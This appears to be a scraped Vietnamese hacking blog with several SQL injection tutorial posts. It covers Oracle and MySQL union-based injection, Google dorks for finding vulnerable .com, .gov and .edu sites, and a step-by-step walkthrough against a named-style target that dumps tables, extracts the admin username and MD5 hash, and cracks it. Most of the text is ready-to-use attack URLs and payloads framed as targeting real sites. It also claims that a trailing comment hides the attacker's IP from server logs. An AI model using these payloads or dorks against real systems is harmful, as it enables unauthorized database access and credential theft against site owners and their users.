www.vuln-web.com/photo.php?id=1' union select null,ora.database_name,null,null,null,null,null,null,null from dual--


To get the username we can use:
(select user from DUAL)
(select user from users)

www.vuln-web.com/photo.php?id=1' union select null,user,null,null,null,null,null,null,null from dual--


To get the version we can use:
(select banner from v$version where rownum=1)

www.vuln-web.com/photo.php?id=1' union select null,(select banner from v$version where rownum=1),null,null,null,null,null,null,null from dual--


To get the Table Names we can use:
(select table_name from all_tables)

www.vuln-web.com/photo.php?id=1' union select null,table_name,null,null,null,null,null,null,null from all_tables--


To get the columns for a specific table we can use (here in example i am using user_table):
(select column_name from all_tab_columns where table_name='Your_Table_name_here')

www.vuln-web.com/photo.php?id=1' union select null,column_name,null,null,null,null,null,null,null from all_tab_columns where table_name='user_table'--


To extract data from some columns we can use the following query alongwith the || as concatination operator:
(select username||password from table_name_here)
www.vuln-web.com/photo.php?id=1' union select null,username||password,null,null,null,null,null,null,null from user_table--



 Author : Zenodermus Javanicus


Nguồn: http://quylevhb.blogspot.com/2015/01/union-based-oracle-injection.html#ixzz4jKrepvhZ
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

[Chap 1] Khái niệm về SQL injection

[Chap 1] Khái niệm về SQL injection
I – Khái niệm
SQL injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp, Sql injection có thể cho phép những kẻ tấn công thực hiện các thao tác, delete, insert, update,… trên cơ sỡ dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy, lỗi này thường xãy ra trên các ứng dụng web có dữ liệu được quản lý bằng các hệ quản trị cơ sở dữ liệu như SQL Server, MySQL, Oracle, DB2, Sysbase...


II- Các cách tấn công
1.       Tìm kiếm site lỗi (Google dorks – Tìm kiếm site lỗi)
2.       Check site
3.       Khai thác
3.1 - Khai thác bằng tay
a.       Sqli basic
b.      String based SQLi
c.       Time based SQLi
d.      Blind SQLi
e.      Error based SQLi
f.        Double query SQLi
g.       POST SQLi
h.      WAF bypassing
3.2  – Khai thác bằng tool
a.       Havij

b.      SQLMap

III - LET'S START !
1.       Một số kiến thức cần biết
-   Dấu nháy đơn (‘): dấu này trong ngôn ngữ SQL dùng để “gói” chuỗi. Ta thường thêm nó vào sau tham số kiểu số trên chuỗi truy vấn để kiểm tra có lỗi hay không. Nguyên nhân là do không kiểm tra kiểu dữ liệu.

-   Dấu thăng (#) và dấu (–): các dấu này để đánh dấu chú thích, nghĩa là những kí tự đứng sau một trong hai dấu này trên cùng một dòng sẽ được xem là chú thích được bỏ qua khi thực hiện truy vấn.

-    Dấu ( ; ): dùng để kết thúc một truy vấn và tất nhiên sau nó là bắt đầu một truy vấn khác. Đôi khi ta dùng union để nối hai câu truy vấn.
-    Dấu -- - ở cuối querry: Tác dụng tránh server ghi log câu querry, IP ….

kiến thức database (CSDL) và ngôn ngữ thiết kế website (PHP, ASP).
MsAccess: thường dành cho các website tin tức quy mô nhỏ, sử dụng ngôn ngữ ASP để thiết kế.
MSSQL: dùng cho website có quy mô lớn, sử dụng ngôn ngữ ASP, ASPX (ASP.Net) để thiết kế.
MySQL: tất cả các website có thể dùng, sử dụng ngôn ngữ PHP để thiết kế (MySQL và PHP là 2 anh em song sinh , chúng luôn đi kèm với nhau ).
Oracle: tương tự như MySQL Db2: dùng cho các hệ thông website ngân hàng các hệ thống cần chế độ bảo mật rất cao!.

2.       Google dorks – Tìm kiếm site lỗi
Bạn có thể sử dụng Google để tìm các site bị lỗi SQL injection.


Ví dụ:   inurl:index.php?id= +.com









Với câu tìm kiếm này ta sẽ tìm kiếm tất cả các site .com và có link chứa "index.php?id"

Một số dork khác:

inurl: index.php?id= +.com
inurl: index.php?id= +.net
inurl: index.php?id= +.org
inurl: index.php?id= +.cc
inurl: index.php?id= +.ws
inurl: index.php?id= +.edu
inurl: index.php?id= +.gov

các bạn có thể xem thêm list dork ở đây:  http://pastebin.com/wUyRb0k8

Ngoài cách tìm kiếm theo tên miền .com hay .net .... các bạn cũng có thể kết hợp tìm kiếm theo từ khóa
Cấu trúc tìm kiếm:  inurl:index.php?id= intext:"từ-khóa" 

Ví dụ:  inurl:index.php?id= intext"cafe"

3.  Check site

Khi xác định được mục tiêu thì các bạn cần kiểm tra các lỗi xem có khả năng tấn công dựa vào nó được không. Các kĩ thuật khai thác lỗi như sau:
· -Với các tham số được truyền vào VD: index.php?id=21 , index.asp?id=6,.. thì chúng ta chỉ cần thêm các kí tự dấu nháy đơn ('), dấu nháy kép ("),
phần trăm 27 (%27), 00 phần trăm (00%) vào sau id để kiểm tra nếu nó hiện ra lỗi hoặc không hiện ra 1 cái gì (khác hoàn toàn với lúc ban đầu thì 90% bạn có
khả năng khai thác được lỗi này - Sẽ trình bày rõ ở phần sau).

-Với các ô submit thông tin như tìm kiếm, login, contact, request,.. các bạn cũng làm tương tự.
Ví Dụ:
http://ww.site.com/index.php?id=1 (giả sử đây là site bị lỗi SQL injection)

           cú pháp                                                        trạng thái

http://ww.site.com/index.php?id=1'                        lỗi
--------
http://ww.site.com/index.php?id=1"                       lỗi
--------
http://ww.site.com/index.php?id=1'                        lỗi
--------
http://ww.site.com/index.php?id=1 and 1=0           lỗi
http://ww.site.com/index.php?id=1 and 1=1           không lỗi

share 1 số kinh nghiệm cho ae:

1. Nếu bạn check lỗi SQL Inj ở 1 website mà bạn không thấy lỗi hiện ra thì đừng nên bỏ qua chúng vì nó có thể bị admin làm cho ẩn đi.
2. Nếu không ra số đẹp khi Union thì hãy view Scoure nó lên và tìm, có thể nó ở trong đó.
3. Thay vì thêm ' vào sau id để kiểm tra thì các bạn có thể sử dụng kĩ thuật
sử dụng các phép toán: VD: and 1=1 hiện ra site , and 1=0 hiện ra site báo lỗi =>> Site đã bị dính sql inj
sử dụng các phép toán kiểu true fales: 
VD: 
2>3 ; 2<3
1--1
BETWEEN 1 AND 3
'b' BETWEEN 'a' AND 'c'
2 IN (0,1,2)
CASA WHEN 1>0 THEN 1 END
' uuu' = 'uuu'
ISNULL(NULL)
ISNULL(COT(0))
1 IS NOT NULL
NULL IS NULL

Nếu tham số (id) của trang hiện tại là 3, tham số trang sau là 2, nếu ta dùng 3-1 , kết quả trả về là nội dung của trang có id=2 thì 99% là site này dính lỗi

4.  Các dạng lỗi thường gặp

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in \\abcxyz\home\users\web\b2371\ipw.meditera\product.php on line 83

Database quero failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '4--'./vn/product/info.asp, line 5

PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:Domainstartanarmy.comwwwrootnewsnews.php on line 19 PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:Domainstartanarmy.comwwwrootnewsnews.php on line 25

b. Lỗi JET :

delete from cart where biaoji=0 and cart_id=19074'
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'biaoji=0 and cart_id=19074''.
/www/sale/1/bd8sogift.com/cart.asp, line 110

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'Id=14' order by PostDate desc'.
/news-s.asp, line 12  

c. Lỗi Search :

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%')' at line 1

Chú ý

- Cũng có khi thêm ' , kết quả trả về vẫn là trang đó thì nó cũng bị lỗi .
- Cũng có khi ta thêm ' , kết quả trả về của site bình thường , ko có thông báo gì hết thì site đó cũng bị lỗi.


Nguồn:  Sưu tầm và tổng hợp trên internet



Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

[Chap 2] Khai thác SQLi lỗi dạng cơ bản

Đối với dạng cơ bản thì ta sẽ khai thác đối với các link site kết thúc có dạng:

id=
category=
decl_id=
num=
sanpham=
product=

và còn một số kiểu khác na ná như trên

ví dụ ta có một site:  http://www.domain.com/?frame=product_detail&id=2598
và giao diện của nó như sau



Bước 1: Check lỗi:

Để biết site có dính lỗi hay không ta thêm dấu  '  vào sau 2598

http://www.domain.com/?frame=product_detail&id=2598'

Nếu giao diện của site thay đổi tức là site đã bị lỗi sqli



Bước 2: Tìm số trường cột
http://www.domain.com/?frame=product_detail&id=2598 order by 1-- -      site bình thường
http://www.domain.com/?frame=product_detail&id=2598 order by 15-- -     Site vẫn bình thường
http://www.domain.com/?frame=product_detail&id=2598 order by 16-- -      Giao diện website thay đổi.

=>   Số trường  cột cần tìm là 15

Bước 3: Xác định vị trí trường cột bị lỗi


http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -


Chú ý là phải có dấu - trước 2598 thì mới xuất hiện ra các con số đẹp.

ví dụ sau khi chạy querry trên chúng ta thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ta sẽ khai thác tại vị trí thứ 2.

Bước 4: Xuất ra tên các tables trong database

http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -

Thông tin về tên các table thu được:

tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor 

Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user).  Vì vậy ta sẽ khai thác ở table này.

Bước 5: Xuất ra tên các colums chứa username và password


http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -

     Lưu ý:   
-          0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex
-          74626c5f75736572 là chữ tbl_user ở dạng hex.
-          Link convert các ký tự sang mã hex:

Thông tin về tên columns thu được:

id,uid,pwd         
                
Bước 6: Xuất ra thông tin về Username và Password

http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -


Thông tin về username và password được mã hóa md5 thu được:

admin/679115597bf9f763506dcc9a8e9e8e82          

Bước 7:  Crack Password và tìm link admin:

-  Có nhiều site để crack passwd, ví dụ:  http://md5cracker.org/

Hoặc sử dụng google để tìm kiếm

- Để tìm link admin các bạn có thể dùng phần mềm :  

DOWNLOAD
Pass unrar:  quylevhb
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:
Đăng ký: Bài đăng (Atom)